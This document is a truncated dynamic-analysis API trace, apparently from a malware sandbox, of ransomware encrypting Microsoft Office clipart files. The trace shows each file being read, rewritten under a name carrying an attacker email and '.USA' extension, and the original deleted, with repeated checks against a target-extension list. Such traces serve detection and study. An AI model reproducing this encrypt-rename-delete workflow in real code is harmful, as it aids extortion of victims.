ReadFile (in: hFile=0x3b4, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x332, lpOverlapped=0x0) returned 1 [0272.255] WriteFile (in: hFile=0x2bc, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x340, lpOverlapped=0x0) returned 1 [0272.255] ReadFile (in: hFile=0x3b4, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.255] WriteFile (in: hFile=0x2bc, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.255] SetEndOfFile (hFile=0x2bc) returned 1 [0272.255] CloseHandle (hObject=0x2bc) returned 1 [0272.255] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.255] SetEndOfFile (hFile=0x3b4) returned 1 [0272.257] CloseHandle (hObject=0x3b4) returned 1 [0272.257] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00513_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.257] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00513_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00513_.wmf")) returned 1 [0272.258] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00513_.WMF") returned 63 [0272.258] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00513_.WMF") returned 63 [0272.258] lstrlenW (lpString=".doc") returned 4 [0272.258] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.258] lstrlenW (lpString=".docx") returned 5 [0272.258] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.258] lstrlenW (lpString=".pdf") returned 4 [0272.258] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.258] lstrlenW (lpString=".xls") returned 4 [0272.258] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.258] lstrlenW (lpString=".xlsx") returned 5 [0272.258] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.258] lstrlenW (lpString=".ppt") returned 4 [0272.258] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.258] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00513_.WMF") returned 63 [0272.258] lstrlenW (lpString=".zip") returned 4 [0272.258] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.258] lstrlenW (lpString=".rar") returned 4 [0272.258] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.258] lstrlenW (lpString=".bz2") returned 4 [0272.258] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.258] lstrlenW (lpString=".7z") returned 3 [0272.258] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.258] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00513_.WMF") returned 63 [0272.258] lstrlenW (lpString=".dbf") returned 4 [0272.258] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.258] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00513_.WMF") returned 63 [0272.258] lstrlenW (lpString=".1cd") returned 4 [0272.258] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.258] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00513_.WMF") returned 63 [0272.258] lstrlenW (lpString=".jpg") returned 4 [0272.258] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.259] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00513_.WMF") returned 63 [0272.259] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00513_.WMF") returned 63 [0272.259] lstrlenW (lpString=".doc") returned 4 [0272.259] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.259] lstrlenW (lpString=".docx") returned 5 [0272.259] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.259] lstrlenW (lpString=".pdf") returned 4 [0272.259] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.259] lstrlenW (lpString=".xls") returned 4 [0272.259] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.259] lstrlenW (lpString=".xlsx") returned 5 [0272.259] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.259] lstrlenW (lpString=".ppt") returned 4 [0272.259] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.259] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00513_.WMF") returned 63 [0272.259] lstrlenW (lpString=".zip") returned 4 [0272.259] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.259] lstrlenW (lpString=".rar") returned 4 [0272.259] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.259] lstrlenW (lpString=".bz2") returned 4 [0272.259] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.259] lstrlenW (lpString=".7z") returned 3 [0272.259] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.259] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00513_.WMF") returned 63 [0272.259] lstrlenW (lpString=".dbf") returned 4 [0272.259] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.259] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00513_.WMF") returned 63 [0272.259] lstrlenW (lpString=".1cd") returned 4 [0272.259] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.259] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00513_.WMF") returned 63 [0272.259] lstrlenW (lpString=".jpg") returned 4 [0272.259] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.260] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0272.260] lstrlenW (lpString="HH00526_.WMF") returned 12 [0272.260] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00526_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00526_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0272.260] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=13538) returned 1 [0272.260] CloseHandle (hObject=0x3b4) returned 1 [0272.260] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00526_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00526_.wmf")) returned 0x20 [0272.260] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00526_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00526_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.260] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00526_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00526_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0272.260] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.260] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.260] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00526_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00526_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0272.263] GetLastError () returned 0x0 [0272.263] ReadFile (in: hFile=0x3b4, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x34e2, lpOverlapped=0x0) returned 1 [0272.264] WriteFile (in: hFile=0x2bc, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x34f0, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x34f0, lpOverlapped=0x0) returned 1 [0272.265] ReadFile (in: hFile=0x3b4, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.265] WriteFile (in: hFile=0x2bc, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.265] SetEndOfFile (hFile=0x2bc) returned 1 [0272.265] CloseHandle (hObject=0x2bc) returned 1 [0272.265] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.265] SetEndOfFile (hFile=0x3b4) returned 1 [0272.267] CloseHandle (hObject=0x3b4) returned 1 [0272.267] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00526_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.267] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00526_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00526_.wmf")) returned 1 [0272.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00526_.WMF") returned 63 [0272.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00526_.WMF") returned 63 [0272.267] lstrlenW (lpString=".doc") returned 4 [0272.267] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.267] lstrlenW (lpString=".docx") returned 5 [0272.267] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.267] lstrlenW (lpString=".pdf") returned 4 [0272.267] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.267] lstrlenW (lpString=".xls") returned 4 [0272.267] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.268] lstrlenW (lpString=".xlsx") returned 5 [0272.268] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.268] lstrlenW (lpString=".ppt") returned 4 [0272.268] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.268] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00526_.WMF") returned 63 [0272.268] lstrlenW (lpString=".zip") returned 4 [0272.268] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.268] lstrlenW (lpString=".rar") returned 4 [0272.268] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.268] lstrlenW (lpString=".bz2") returned 4 [0272.268] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.268] lstrlenW (lpString=".7z") returned 3 [0272.268] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.268] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00526_.WMF") returned 63 [0272.268] lstrlenW (lpString=".dbf") returned 4 [0272.268] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.268] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00526_.WMF") returned 63 [0272.268] lstrlenW (lpString=".1cd") returned 4 [0272.268] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.268] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00526_.WMF") returned 63 [0272.268] lstrlenW (lpString=".jpg") returned 4 [0272.268] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.268] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00526_.WMF") returned 63 [0272.268] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00526_.WMF") returned 63 [0272.268] lstrlenW (lpString=".doc") returned 4 [0272.268] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.268] lstrlenW (lpString=".docx") returned 5 [0272.268] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.268] lstrlenW (lpString=".pdf") returned 4 [0272.268] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.268] lstrlenW (lpString=".xls") returned 4 [0272.268] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.269] lstrlenW (lpString=".xlsx") returned 5 [0272.269] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.269] lstrlenW (lpString=".ppt") returned 4 [0272.269] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.269] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00526_.WMF") returned 63 [0272.269] lstrlenW (lpString=".zip") returned 4 [0272.269] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.269] lstrlenW (lpString=".rar") returned 4 [0272.269] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.269] lstrlenW (lpString=".bz2") returned 4 [0272.269] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.269] lstrlenW (lpString=".7z") returned 3 [0272.269] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.269] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00526_.WMF") returned 63 [0272.269] lstrlenW (lpString=".dbf") returned 4 [0272.269] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.269] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00526_.WMF") returned 63 [0272.269] lstrlenW (lpString=".1cd") returned 4 [0272.269] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.269] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00526_.WMF") returned 63 [0272.269] lstrlenW (lpString=".jpg") returned 4 [0272.269] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.269] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0272.269] lstrlenW (lpString="HH00527_.WMF") returned 12 [0272.269] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00527_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00527_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0272.357] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=5798) returned 1 [0272.357] CloseHandle (hObject=0x394) returned 1 [0272.357] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00527_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00527_.wmf")) returned 0x20 [0272.397] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00527_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00527_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.398] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00527_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00527_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0272.398] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.398] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.398] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00527_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00527_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0272.399] GetLastError () returned 0x0 [0272.399] ReadFile (in: hFile=0x384, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x16a6, lpOverlapped=0x0) returned 1 [0272.429] WriteFile (in: hFile=0x380, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x16b0, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x16b0, lpOverlapped=0x0) returned 1 [0272.430] ReadFile (in: hFile=0x384, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.430] WriteFile (in: hFile=0x380, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.430] SetEndOfFile (hFile=0x380) returned 1 [0272.430] CloseHandle (hObject=0x380) returned 1 [0272.430] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.430] SetEndOfFile (hFile=0x384) returned 1 [0272.432] CloseHandle (hObject=0x384) returned 1 [0272.432] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00527_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.433] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00527_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00527_.wmf")) returned 1 [0272.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00527_.WMF") returned 63 [0272.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00527_.WMF") returned 63 [0272.433] lstrlenW (lpString=".doc") returned 4 [0272.433] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.433] lstrlenW (lpString=".docx") returned 5 [0272.433] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.433] lstrlenW (lpString=".pdf") returned 4 [0272.433] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.433] lstrlenW (lpString=".xls") returned 4 [0272.433] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.433] lstrlenW (lpString=".xlsx") returned 5 [0272.433] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.433] lstrlenW (lpString=".ppt") returned 4 [0272.433] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00527_.WMF") returned 63 [0272.433] lstrlenW (lpString=".zip") returned 4 [0272.433] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.433] lstrlenW (lpString=".rar") returned 4 [0272.433] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.433] lstrlenW (lpString=".bz2") returned 4 [0272.433] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.433] lstrlenW (lpString=".7z") returned 3 [0272.434] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00527_.WMF") returned 63 [0272.434] lstrlenW (lpString=".dbf") returned 4 [0272.434] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00527_.WMF") returned 63 [0272.434] lstrlenW (lpString=".1cd") returned 4 [0272.434] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00527_.WMF") returned 63 [0272.434] lstrlenW (lpString=".jpg") returned 4 [0272.434] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00527_.WMF") returned 63 [0272.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00527_.WMF") returned 63 [0272.434] lstrlenW (lpString=".doc") returned 4 [0272.434] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.434] lstrlenW (lpString=".docx") returned 5 [0272.434] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.434] lstrlenW (lpString=".pdf") returned 4 [0272.434] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.434] lstrlenW (lpString=".xls") returned 4 [0272.434] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.434] lstrlenW (lpString=".xlsx") returned 5 [0272.434] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.434] lstrlenW (lpString=".ppt") returned 4 [0272.434] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00527_.WMF") returned 63 [0272.434] lstrlenW (lpString=".zip") returned 4 [0272.434] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.434] lstrlenW (lpString=".rar") returned 4 [0272.434] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.434] lstrlenW (lpString=".bz2") returned 4 [0272.434] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.435] lstrlenW (lpString=".7z") returned 3 [0272.435] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00527_.WMF") returned 63 [0272.435] lstrlenW (lpString=".dbf") returned 4 [0272.435] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00527_.WMF") returned 63 [0272.435] lstrlenW (lpString=".1cd") returned 4 [0272.435] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00527_.WMF") returned 63 [0272.435] lstrlenW (lpString=".jpg") returned 4 [0272.435] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.435] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0272.435] lstrlenW (lpString="HH00612_.WMF") returned 12 [0272.435] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00612_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0272.468] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=12632) returned 1 [0272.468] CloseHandle (hObject=0x388) returned 1 [0272.468] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00612_.wmf")) returned 0x20 [0272.701] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00612_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.890] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00612_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0272.890] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.890] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.890] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00612_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0272.890] GetLastError () returned 0x0 [0272.890] ReadFile (in: hFile=0x3a8, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x3158, lpOverlapped=0x0) returned 1 [0272.942] WriteFile (in: hFile=0x388, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x3160, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x3160, lpOverlapped=0x0) returned 1 [0272.944] ReadFile (in: hFile=0x3a8, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, 